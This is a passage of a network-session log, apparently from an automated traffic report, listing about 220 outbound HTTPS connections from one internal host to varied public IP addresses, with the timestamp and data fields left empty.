                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17307192.168.2.1440826101.227.221.72443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17308192.168.2.144897224.251.32.129443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17309192.168.2.143503634.92.104.35443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17310192.168.2.145373235.35.63.10443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17311192.168.2.145740296.145.170.128443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17312192.168.2.1440556132.149.242.107443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17313192.168.2.1448706137.166.46.18443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17314192.168.2.1451952159.21.178.98443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17315192.168.2.1438596138.111.215.77443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17316192.168.2.144644448.214.140.131443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17317192.168.2.144606027.61.26.149443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17318192.168.2.1443608150.113.6.136443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17319192.168.2.1457046204.175.205.122443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17320192.168.2.143987496.150.130.0443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17321192.168.2.144341270.170.222.74443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17322192.168.2.145445448.101.145.140443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17323192.168.2.144520494.4.4.171443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17324192.168.2.1445982187.250.137.0443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17325192.168.2.144284852.115.19.197443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17326192.168.2.143573025.38.106.179443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17327192.168.2.1454016201.30.182.7443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17328192.168.2.1435150205.245.203.8443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17329192.168.2.143732882.189.141.195443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17330192.168.2.143938865.90.114.86443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17331192.168.2.1444226200.128.16.239443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17332192.168.2.1436534100.206.150.158443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17333192.168.2.1445512125.50.7.240443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17334192.168.2.1442976218.148.250.141443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17335192.168.2.145971838.239.229.219443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17336192.168.2.145103462.169.219.205443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17337192.168.2.144677435.66.155.221443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17338192.168.2.145154882.9.169.172443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17339192.168.2.1456840200.125.213.141443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17340192.168.2.143520658.24.76.59443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17341192.168.2.1437506167.196.161.82443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17342192.168.2.1438698116.171.112.141443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17343192.168.2.145235271.255.224.67443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17344192.168.2.144074050.163.38.170443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17345192.168.2.1444438109.38.188.53443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17346192.168.2.145438688.121.47.36443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17347192.168.2.145258018.133.94.150443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17348192.168.2.145431485.92.169.84443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17349192.168.2.1460410112.222.180.97443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17350192.168.2.143635053.230.166.73443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17351192.168.2.145906438.66.223.150443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17352192.168.2.1439992169.202.223.81443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17353192.168.2.1440922206.144.139.37443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17354192.168.2.145036420.125.113.21443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17355192.168.2.144621464.101.24.146443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17356192.168.2.14330665.131.88.235443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17357192.168.2.145825671.140.112.53443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17358192.168.2.145380263.161.169.138443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17359192.168.2.1441834130.81.117.218443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17360192.168.2.144371012.147.128.145443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17361192.168.2.144850091.134.233.225443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17362192.168.2.143605479.92.205.220443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17363192.168.2.1448858139.41.38.191443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17364192.168.2.1460180150.200.187.117443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17365192.168.2.1450736206.166.250.38443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17366192.168.2.144096471.118.1.139443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17367192.168.2.145941449.162.67.108443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17368192.168.2.1452456189.67.143.255443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17369192.168.2.143620853.216.252.149443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17370192.168.2.1445792125.111.29.133443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17371192.168.2.1459724200.229.225.185443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17372192.168.2.1458242151.17.50.184443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17373192.168.2.144125619.86.225.33443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17374192.168.2.143410647.132.204.239443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17375192.168.2.1449460136.111.116.102443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17376192.168.2.145224663.2.151.149443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17377192.168.2.1434840132.122.4.244443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17378192.168.2.1437852157.51.129.197443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17379192.168.2.145325690.230.254.4443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17380192.168.2.1440218166.189.63.126443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17381192.168.2.1454408208.200.35.86443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17382192.168.2.1448654213.120.166.225443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17383192.168.2.143966076.111.77.81443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17384192.168.2.144283877.147.167.221443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17385192.168.2.144752232.138.147.114443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17386192.168.2.146037268.178.155.78443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17387192.168.2.145926486.183.131.93443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17388192.168.2.14430842.29.39.29443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17389192.168.2.1448868205.148.196.199443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17390192.168.2.1459700144.25.247.243443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17391192.168.2.1445616114.247.3.40443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17392192.168.2.1447064171.115.104.91443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17393192.168.2.1438848172.38.208.28443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17394192.168.2.144259873.117.226.186443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17395192.168.2.1439430180.68.130.248443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17396192.168.2.143942440.87.210.146443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17397192.168.2.143878476.132.75.140443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17398192.168.2.1453414138.97.87.90443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17399192.168.2.1456722207.91.102.204443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17400192.168.2.143382427.232.178.130443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17401192.168.2.144950076.131.117.50443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17402192.168.2.143607292.88.88.222443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17403192.168.2.1452614105.74.239.217443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17404192.168.2.1444990114.99.205.244443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17405192.168.2.1437860185.154.48.195443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17406192.168.2.1447742151.53.12.232443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17407192.168.2.1455716134.106.126.148443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17408192.168.2.1451530181.216.201.157443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17409192.168.2.1449326204.173.38.75443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17410192.168.2.143689460.229.179.139443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17411192.168.2.1459552167.159.240.217443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17412192.168.2.1444000132.60.202.59443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17413192.168.2.1451436128.222.56.91443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17414192.168.2.1446786192.206.185.241443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17415192.168.2.143509050.144.134.131443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17416192.168.2.145014273.180.215.119443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17417192.168.2.144911894.189.165.60443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17418192.168.2.1447332170.208.160.98443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17419192.168.2.1445000195.105.222.85443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17420192.168.2.1437158112.40.2.180443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17421192.168.2.1450296118.5.89.130443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17422192.168.2.143921257.2.134.250443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17423192.168.2.1457224150.168.221.26443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17424192.168.2.145757467.252.249.33443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17425192.168.2.1451978184.50.191.156443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17426192.168.2.144867297.47.61.143443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17427192.168.2.143518849.129.231.4443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17428192.168.2.143773446.100.218.244443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17429192.168.2.1443804150.140.49.66443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17430192.168.2.1453432179.93.71.18443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17431192.168.2.1458424141.166.230.160443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17432192.168.2.145750865.36.56.30443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17433192.168.2.145562279.212.255.113443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17434192.168.2.1459876180.69.8.26443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17435192.168.2.143971845.12.182.94443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17436192.168.2.144612492.9.140.105443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17437192.168.2.1460122152.89.249.221443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17438192.168.2.144806825.14.54.69443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17439192.168.2.1435102213.130.154.218443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17440192.168.2.1453492191.230.235.49443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17441192.168.2.143769245.74.249.130443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17442192.168.2.145724897.102.127.227443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17443192.168.2.1450038203.161.213.55443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17444192.168.2.1456278153.32.69.72443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17445192.168.2.1443252129.189.193.63443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17446192.168.2.144070274.6.223.57443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17447192.168.2.14515788.38.163.2443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17448192.168.2.1452898209.13.43.202443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17449192.168.2.144301498.158.95.180443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17450192.168.2.1439672198.58.248.203443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17451192.168.2.1443936132.35.201.136443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17452192.168.2.145023486.42.87.229443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17453192.168.2.145453425.56.146.66443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17454192.168.2.143482057.29.96.35443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17455192.168.2.1439058122.193.237.18443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17456192.168.2.1440006179.232.39.154443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17457192.168.2.1455104180.1.192.63443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17458192.168.2.1448138186.251.118.105443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17459192.168.2.1449280105.227.69.111443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17460192.168.2.145474665.75.3.148443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17461192.168.2.14496388.62.23.185443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17462192.168.2.1459786104.204.115.240443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17463192.168.2.1448816154.0.193.226443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17464192.168.2.145279254.162.39.104443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17465192.168.2.14441765.104.116.66443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17466192.168.2.143395678.244.40.253443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17467192.168.2.143431071.193.198.90443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17468192.168.2.1449912183.157.231.237443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17469192.168.2.145011831.249.231.68443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17470192.168.2.14347504.149.38.8443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17471192.168.2.1442084217.104.193.107443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17472192.168.2.1432904131.227.134.154443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17473192.168.2.1451060209.249.10.139443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17474192.168.2.143868631.109.181.181443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17475192.168.2.1459712129.155.235.118443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17476192.168.2.1439614195.136.242.77443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17477192.168.2.1459460141.104.62.152443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17478192.168.2.145984486.102.94.227443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17479192.168.2.1450040209.96.94.134443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17480192.168.2.1459532148.49.182.213443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17481192.168.2.145887450.225.151.106443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17482192.168.2.1452960144.15.100.131443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17483192.168.2.1441736142.6.174.55443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17484192.168.2.145593679.21.131.223443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17485192.168.2.143288218.13.224.120443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17486192.168.2.145286644.28.181.243443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17487192.168.2.1433172155.185.182.158443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17488192.168.2.1457140223.9.171.75443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17489192.168.2.144666250.248.1.36443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17490192.168.2.1449550190.55.39.172443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17491192.168.2.145306046.223.56.48443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17492192.168.2.1436690133.49.192.37443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17493192.168.2.1451630220.164.67.119443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17494192.168.2.1436040181.179.144.219443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17495192.168.2.143403458.5.140.112443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17496192.168.2.146070620.203.116.72443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17497192.168.2.144806482.237.185.167443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17498192.168.2.1439846178.140.154.91443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17499192.168.2.145239480.30.181.226443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17500192.168.2.1457644147.244.197.192443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17501192.168.2.146035413.155.207.244443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17502192.168.2.143614899.34.198.94443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17503192.168.2.1459472137.138.62.93443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17504192.168.2.145379659.106.149.70443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17505192.168.2.1460864107.226.55.12443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17506192.168.2.1457570131.233.151.141443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17507192.168.2.1456796125.214.195.151443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17508192.168.2.1440984116.88.23.234443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17509192.168.2.145665437.186.77.202443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17510192.168.2.1438542125.140.208.64443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17511192.168.2.1460198176.225.91.33443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17512192.168.2.1454694113.243.166.233443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17513192.168.2.1455152222.244.72.219443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17514192.168.2.1444772115.2.142.71443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17515192.168.2.1445526159.189.202.183443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17516192.168.2.1458540205.138.245.122443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17517192.168.2.1437820185.3.25.36443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17518192.168.2.1445820100.191.148.172443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17519192.168.2.143442672.208.198.203443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17520192.168.2.144822612.110.224.234443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17521192.168.2.145399439.71.70.226443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17522192.168.2.1445918144.59.18.213443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17523192.168.2.145064095.106.196.215443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17524192.168.2.145385617.246.138.6443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17525192.168.2.1450776160.186.63.197443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17526192.168.2.143505478.82.23.217443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17527192.168.2.1439162163.163.183.153443
                                              TimestampBytes transferredDirectionData


                                              Session IDSource IPSource PortDestination IPDestination Port
                                              17528192.168.2.1438740148.146.121.244443
                                              TimestampBytes transferredDirectionData


